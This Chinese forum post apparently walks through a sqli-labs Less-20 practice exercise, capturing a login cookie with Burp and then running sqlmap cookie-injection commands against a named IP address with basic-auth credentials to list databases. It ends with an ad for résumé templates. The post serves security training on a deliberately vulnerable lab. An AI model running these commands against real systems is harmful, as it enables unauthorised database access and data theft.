sqlmap使用_如何使用SQLMap进行cookie注入

论坛 期权论坛 脚本     
已经匿名di用户   2022-4-16 00:33   2654   0

7cf556b0335700f42087621623ec6acf.png

1 f39d5af4ea54935f9dfcbdeafda2a8d0.png 1

登录目标地址,输入用户名和密码,用户名和密码都是admin

20dd46dcce9da92e92be0d6933073480.png

点击Submit

a78080bb776787df2dd122b18e83e005.png

开启代理服务 选择 HTTP代理:127.0.0.1,端口:8080

打开 burp

3a611aaf1a818e97bfc1dcfda2e41c17.png

通过抓包,我们知道登录的cookie是uname=admin

f39d5af4ea54935f9dfcbdeafda2a8d0.png 2

进行sqlmap的cookie注入攻击

windows 下命令为

C:\Python27\sqlmap>sqlmap.py -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2

Linux 下命令为

sqlmap -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2

说明: 参数: --level=LEVEL

默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用 --level参数且数值>=2的时候会进行cookie注入测试;当>=3时,会进行User-Agent和Referer的注入测试。

结果画面为

b4fcfc733085e763fde7e72d23960238.png

接下来可以爆表爆数据了。

想领取【200份简历模板】请加小唐老师微信 回复暗号:200

a99c7f4d82eb3c5a51bda7ef4a032ed7.png

4828055920dcd2c80ff30909b7f8aad3.png

f566ae70e7279fab5213e13295ce4e81.png

1908f21bad6558b2564c6f566775819b.png

10c53989c53d283b393198cc5ae3ba1b.png

495594dc062bf7b55f72e163160b778a.png

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:81
帖子:4969
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP